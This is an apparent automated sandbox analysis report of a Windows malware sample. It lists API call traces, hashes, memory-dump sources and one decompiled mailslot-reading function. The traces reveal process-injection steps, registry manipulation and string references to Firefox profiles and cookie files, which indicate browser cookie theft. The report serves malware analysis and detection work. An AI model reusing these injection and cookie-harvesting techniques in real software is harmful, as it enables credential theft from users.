  • Instruction Fuzzy Hash: a6448fe3859533787f46fd028fbdedb87b619524ac454660b260fde8abe63a7b
APIs
  • lstrlen.KERNEL32(74C08500,?,00000000,001CD8AF,?,001EB068), ref: 001D7D47
  • VirtualProtect.KERNELBASE(00000000,00000000,00000040,-0000001C,?,00000000,001CD8AF,?,001EB068), ref: 001D7D59
  • lstrcpy.KERNEL32(00000000,74C08500), ref: 001D7D68
  • VirtualProtect.KERNELBASE(00000000,00000000,?,-0000001C,?,00000000,001CD8AF,?,001EB068), ref: 001D7D79
  • VirtualProtect.KERNELBASE(?,00000005,00000040,-0000001C,001E74D8,00000018,001D7F15,001E51C0,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DA7
  • VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DC2
  • VirtualProtect.KERNELBASE(?,00000004,00000040,-0000001C,001E74D8,00000018,001D7F15,001E51C0,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DFE
  • VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7E18
  • GetLastError.KERNEL32(?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7E1F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 29
  • API ID: FindWindowGetModuleHandleGetWindowThreadProcessIdLoadLibrary
  • String ID: USER32.DLL$pnls$pnls
  • API String ID: 1514306980-1300720345
  • Opcode ID: 50136b8a9ad019f77738c7d2695a80d9cfa58a10d54e3dd229c6b48dc4baf302
  • Instruction ID: 33d9b5e3af68464c4ee12d6cec6cbf656236a2a99d1b1536a0d5b0eb5269df1d
  • Opcode Fuzzy Hash: 2ED0A7C10F5D4412085E48CC143A5A300CAEC2171527BAE2F3439681A14B52311D0EC9
  • Instruction Fuzzy Hash: 33d9b5e3af68464c4ee12d6cec6cbf656236a2a99d1b1536a0d5b0eb5269df1d
APIs
  • LoadLibraryA.KERNEL32(USER32.DLL), ref: 01B314D9
  • GetModuleHandleA.KERNEL32(USER32.DLL,01B38000,?,?,01B3180F,00000000,?,01B37494), ref: 01B314FF
  • FindWindowA.USER32(01B38640,00000000,?,?,01B3180F,00000000,?,01B37494), ref: 01B31515
  • GetWindowThreadProcessId.USER32(00000000,00000000,?,?,01B3180F,00000000,?,01B37494), ref: 01B31520
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: a72f6809e5b1c4c7d5409b103898ea3008340710279a26a1989ceb7ae5150f24
  • Instruction ID: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
  • Opcode Fuzzy Hash: F6E02B8C1B8C09C3C66C0C8B15B4B121153CFE2F119FCD38932A06A41DA356BC346F8C
  • Instruction Fuzzy Hash: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
APIs
  • InterlockedIncrement.KERNEL32(01B37448), ref: 01B310B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 01B310C5
    • Part of subcall function 01B31000: memcpy.NTDLL(01B37570,?,0000000C,01B36248,0000000C,01B310E9,?,00000000,?), ref: 01B31038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 01B310F1
  • InterlockedDecrement.KERNEL32(01B37448), ref: 01B31109
  • SleepEx.KERNEL32(00000064,00000001), ref: 01B31125
  • CloseHandle.KERNEL32 ref: 01B31141
  • HeapDestroy.KERNEL32 ref: 01B3114E
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a541a8e2a336522e40d1be30749048c9d818c078e896fa602c1e5c17c186f932
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 7FE026810629C5C686BB500A28013B370CBBB7178BD9EE7700AA7390831FC23017564A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,?,00401062,00001000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 9e01726764579839827e9094e6fbaf3217b41c7c4a8b193b143c1758af8567f1
  • Instruction ID: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
  • Opcode Fuzzy Hash: 43D0C2690F8C3ED0810A040688F172332011FA0B4E63CD81537A134011E7F07789CB0C
  • Instruction Fuzzy Hash: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
APIs
  • CreateFileW.KERNEL32(01B374BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 01B31689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B3169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B316B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,01B37494), ref: 01B316C9
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316D7
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316E4
  • GetLastError.KERNEL32(?,01B37494), ref: 01B316F3
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: 9df6b1f1380250b2af8b1cb859a0ad26280c930233838fa98c0b82c5bdb989db
  • Instruction ID: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
  • Opcode Fuzzy Hash: 3B01FE0E036F83C2ED6626011251FA1A381BF43A70E8EA726B371213DE5F54B50D870D
  • Instruction Fuzzy Hash: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
APIs
  • memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B332C5: GetModuleHandleA.KERNEL32(01B3811F,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B332DF
    • Part of subcall function 01B332C5: GetProcAddress.KERNEL32(00000000,01B3865C,?,?,01B31790,00000000,?,01B37494), ref: 01B332F0
    • Part of subcall function 01B332C5: OpenProcess.KERNEL32(00000400,00000000,01B37494,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3330D
    • Part of subcall function 01B332C5: IsWow64Process.KERNELBASE(01B374A4,?,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3331E
    • Part of subcall function 01B332C5: CloseHandle.KERNEL32(01B374A4), ref: 01B33331
    • Part of subcall function 01B33DE6: NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
    • Part of subcall function 01B33DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
    • Part of subcall function 01B33DE6: SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
  • ResumeThread.KERNELBASE(?), ref: 01B32418
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000,01B324C1), ref: 01B31A4D
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1), ref: 01B31A81
  • ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
  • WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
  • SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
    • Part of subcall function 01B32175: memset.NTDLL ref: 01B321A3
    • Part of subcall function 01B32175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 01B3222D
    • Part of subcall function 01B32175: WaitForSingleObject.KERNEL32(00000064), ref: 01B3223B
    • Part of subcall function 01B32175: SuspendThread.KERNEL32(?), ref: 01B3224E
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31DE0
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31E2F
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,01B324F9,00000800,?,?,?,00000000), ref: 01B31E9F
    • Part of subcall function 01B31CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 01B31ECA
    • Part of subcall function 01B31CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B31ED1
    • Part of subcall function 01B31CB2: CloseHandle.KERNEL32(00000000), ref: 01B31EE0
    • Part of subcall function 01B31CB2: memset.NTDLL ref: 01B31EF4
  • GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 97
  • API ID: VirtualProtect$GetLastErrorRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2510858262-0
  • Opcode ID: 79e378e90741fe03a1868ff575f465e1dcc9b1d4b7d085768b56240e49bf8d92
  • Instruction ID: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
  • Opcode Fuzzy Hash: B2019C28149E95B7D43BB0841C52EC1C254BB53294C1D6372E892241C73F007709BB19
  • Instruction Fuzzy Hash: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
APIs
    • Part of subcall function 001D75AC: GetLastError.KERNEL32(00000024,?,001D7807,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?,?,00000000,001E5050,00000000), ref: 001D75D9
    • Part of subcall function 001D9FF2: lstrcmpi.KERNEL32(?,00000000), ref: 001DA027
  • VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,00000000,?,00000000,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?), ref: 001D7865
  • VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,001CB2EF), ref: 001D789F
  • RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D78E5
    • Part of subcall function 001D7646: lstrlen.KERNEL32(00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7678
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7692
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D76C5
  • RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D78C7
  • GetLastError.KERNEL32(?,001CB2EF), ref: 001D78FA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DA098: lstrcmpi.KERNEL32(?,00000000), ref: 001DA0DC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 334b4ad23c3ebcab69ace51bbaeeff1e78eacdd0a0d3c55371ac3bd1638c0514
  • Instruction ID: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
  • Opcode Fuzzy Hash: 4CD05EF84B9C968B402B7450581D36CA586B9D12C5ACC3663F326A685EAB11B3D0477A
  • Instruction Fuzzy Hash: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
APIs
  • GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
  • GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
  • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
  • IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
  • CloseHandle.KERNEL32(00000000), ref: 001D8391
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 7bf492882853c3015655118e3a7311c329205b35a24c50d6a171498e9cb856b8
  • Instruction ID: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
  • Opcode Fuzzy Hash: 88F0C94503ACC397C42F94822FA2B63E242EF219C8C8CE795BBB47E1F91D6036124627
  • Instruction Fuzzy Hash: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,01B37494), ref: 01B34244
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • RegEnumKeyExA.KERNEL32(?,?,?,01B37494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B3428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 01B342F8
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
    • Part of subcall function 01B32E04: StrChrA.SHLWAPI(01B37494,0000005F), ref: 01B32E47
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B37494), ref: 01B32E5F
    • Part of subcall function 01B32E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 01B32E95
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32EBB
    • Part of subcall function 01B32E04: lstrlenW.KERNEL32 ref: 01B32ECC
    • Part of subcall function 01B32E04: RtlAllocateHeap.NTDLL(00000000,01B374CA), ref: 01B32EE1
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32F06
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F2A
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F3C
    • Part of subcall function 01B32E04: lstrcmpiW.KERNEL32(00000000), ref: 01B32F53
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B380FA), ref: 01B32F95
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,?), ref: 01B32FEE
    • Part of subcall function 01B32E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 01B33002
    • Part of subcall function 01B32E04: RegQueryValueExA.ADVAPI32(?,01B38256,00000000,?,?,01B37494), ref: 01B33025
    • Part of subcall function 01B32E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,01B342EB,?,?,01B34303,0AEBFFFF), ref: 01B33088
    • Part of subcall function 01B32E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 01B330A3
    • Part of subcall function 01B32E04: RegDeleteValueW.ADVAPI32(?,01B37560), ref: 01B330B1
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330BA
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330C3
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,01B37494,?), ref: 01B330D8
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,00000000), ref: 01B330FB
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(00000000), ref: 01B3310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B34320
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: f05951512fc70493bcc218ada1478013eab1d332df878026975bea813deea018
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 32E026401A9D83C9C64754854852F22B264E764646DACF7626718BF232AF263236DF2A
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 01B33C8B: GetModuleFileNameW.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB1
    • Part of subcall function 01B33C8B: GetModuleFileNameA.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB9
    • Part of subcall function 01B33C8B: GetLastError.KERNEL32(?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000,?,?,?,01B317BE), ref: 01B33CF7
    • Part of subcall function 01B348FB: lstrcmp.KERNEL32(?,01B37494), ref: 01B349A8
    • Part of subcall function 01B348FB: lstrlen.KERNEL32(?,00000000,00000000,01B31852), ref: 01B349B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01B333BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,01B31BAF,01B38451), ref: 01B333CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 01B333E5
  • CloseHandle.KERNEL32(?), ref: 01B33400
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 64
  • API ID: HeapFreeRegCloseKeyRegQueryValueExRtlAllocateHeap
  • String ID:
  • API String ID: 1519508758-0
  • Opcode ID: 2c20f16d7cb35b0837f37e1f163c74e89bf46e78e287d7b3e7984998dc48fbe4
  • Instruction ID: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
  • Opcode Fuzzy Hash: BFE07DE10F45C256111F7D4A647FA76C310CC440D130C7313BD74596BD0E43301B8709
  • Instruction Fuzzy Hash: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
  • HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 129
  • API ID: RegCreateKeyRegOpenKeylstrlen
  • String ID:
  • API String ID: 3913359509-0
  • Opcode ID: 4a10325c95453f6cc476ef8e5a47647315785bf9e091164d0adb2aeafd4fec03
  • Instruction ID: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
  • Opcode Fuzzy Hash: 9CD0A934820C8ACBC02B88001C6AA2A80A0AB010C2C8C627278C23912B2F9072892EA5
  • Instruction Fuzzy Hash: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
APIs
  • RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
  • RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
  • lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 21
  • API ID: CloseHandleHeapDestroySetEvent
  • String ID:
  • API String ID: 940165256-0
  • Opcode ID: 9ef5631c8bac1d91cf9c9a8d655f5ac6c0fb341a42f1a83b4f8136061da9b6f1
  • Instruction ID: 63a92b369f7ff46b766476c1ccb031f26dca40fd5dc26ecec47464628f2d12c5
  • Opcode Fuzzy Hash: 40B09B700107148D0D4F047041953BE4754F3652C344D0501F101A44C8A503C5DF4F73
  • Instruction Fuzzy Hash: 63a92b369f7ff46b766476c1ccb031f26dca40fd5dc26ecec47464628f2d12c5
APIs
  • SetEvent.KERNEL32(001EB094,001CD22D), ref: 001C13E0
    • Part of subcall function 001CD890: SleepEx.KERNELBASE(00000064,00000001,?,001EB068,?,00000000,001C13EB), ref: 001CD8B9
    • Part of subcall function 001CD890: HeapFree.KERNEL32(00000000,001EB160), ref: 001CD964
    • Part of subcall function 001CD890: RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CD99D
    • Part of subcall function 001CD890: ReleaseMutex.KERNEL32(001EB020,?,001EB068,?,00000000,001C13EB), ref: 001CD9AD
    • Part of subcall function 001CD890: LocalFree.KERNEL32(?,001EB068,?,00000000,001C13EB), ref: 001CDA08
  • CloseHandle.KERNEL32(001EB094), ref: 001C13F5
  • HeapDestroy.KERNELBASE(001EAF48), ref: 001C1405
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 9f49d05889e80fbb51cd0c4b68011b25098bf7b4279eb4dc5b0c99da5f87a796
  • Instruction ID: d805b8808fabc8a834a627e3aba00d686e12190f07f1f9d143048ed308849f7e
  • Opcode Fuzzy Hash: C4E08605119E80CFC45654561E3517755B4FF11D054D9F37477C01BAF5DE662D242E07
  • Instruction Fuzzy Hash: d805b8808fabc8a834a627e3aba00d686e12190f07f1f9d143048ed308849f7e
APIs
    • Part of subcall function 01B345C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 01B34610
    • Part of subcall function 01B3475C: lstrlen.KERNEL32(01B3618C,00000000,?,00000027,01B3618C,00000000,00000000,01B3822E,00000000,?,01B3618C,00000000,00000000), ref: 01B34792
    • Part of subcall function 01B3475C: lstrcpy.KERNEL32(00000000,00000000), ref: 01B347B6
    • Part of subcall function 01B3475C: lstrcat.KERNEL32(00000000,00000000), ref: 01B347BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 01B31217
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false

Similar Non-Executed Functions

Similarity
  • Total matches: 59
  • API ID: HeapFree$RtlAllocateHeaplstrcat$CreateDirectoryDeleteFilelstrlenmbstowcs
  • String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$\cookie.ff$\cookie.ie$\sols
  • API String ID: 2820067504-4232923486
  • Opcode ID: 3d14cf29faf766bfeb75039b264b2d7cbadb4797a584a71d88c970bf056bfa6f
  • Instruction ID: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
  • Opcode Fuzzy Hash: A2118CB00A05034BC02BA862E5AA37F4981BE835C4C4D1763FE05AB12E1F5731E67F0B
  • Instruction Fuzzy Hash: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
APIs
  • lstrlen.KERNEL32(%APPDATA%), ref: 001C1C68
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • RtlAllocateHeap.NTDLL(00000000,?,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C1CB3
  • mbstowcs.NTDLL ref: 001C1CC6
  • lstrcatW.KERNEL32(00000000,001EC804), ref: 001C1CD5
